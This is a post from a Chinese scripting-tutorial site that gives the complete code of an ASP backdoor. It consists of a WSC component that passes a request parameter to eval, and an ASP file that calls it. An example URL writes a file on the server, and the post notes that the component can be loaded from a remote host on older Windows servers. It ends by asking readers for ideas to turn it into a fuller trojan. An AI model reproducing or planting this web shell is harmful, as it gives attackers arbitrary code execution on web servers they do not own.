脚本之家,脚本语言编程技术及教程分享平台!
分类导航

Python|VBS|Ruby|Lua|perl|VBA|Golang|PowerShell|Erlang|autoit|Dos|bat|

服务器之家 - 脚本之家 - VBS - 利用wsc制作的一个asp后门

利用wsc制作的一个asp后门

2020-07-26 11:41脚本之家 VBS

ScriptCodingInfo.wsc代码如下,该文件可以改成任意后缀

  1. <?xml version="1.0" encoding="gb2312" standalone="yes"?> 
  2. <?component error="true" debug="true"?> 
  3. <package
  4. <component id="haiyangtop"
  5. <public
  6. <method name="lcx"><parameter name="b"/></method> 
  7. </public
  8. <script language="VBScript"><![CDATA[ 
  9. sub lcx(b) 
  10. eval(b) 
  11. end sub 
  12. ]]> 
  13. </script> 
  14. </component> 
  15. </package


backdoor.asp内容如下:

  1. <% 
  2. b=request("a"
  3. Set fs = GetObject("script:d:/web/ScriptCodingInfo.wsc#haiyangtop"
  4. fs.lcx(b) 
  5. %> 


调用方法如下:http://url/backdoor.asp?a=CreateObject("Scripting.FileSystemObject").OpenTextFile("c:\1122.txt"),8,True,0).WriteLine("123")
注意这里的a=只能是vbs的代码,不可以接受像response、rquest之类的asp的东东。
如果是2000服务器可以在backdoor.asp远程调用ScriptCodingInfo.wsc,像
Set fs = GetObject("script:http://www.xx.com/ScriptCodingInfo.wsc#haiyangtop"),2003服务器中不可以。
算一个思路,鸡肋,谁有更好的办法完善,能够直接调用cs的asp木马的c端就好了。

延伸 · 阅读

精彩推荐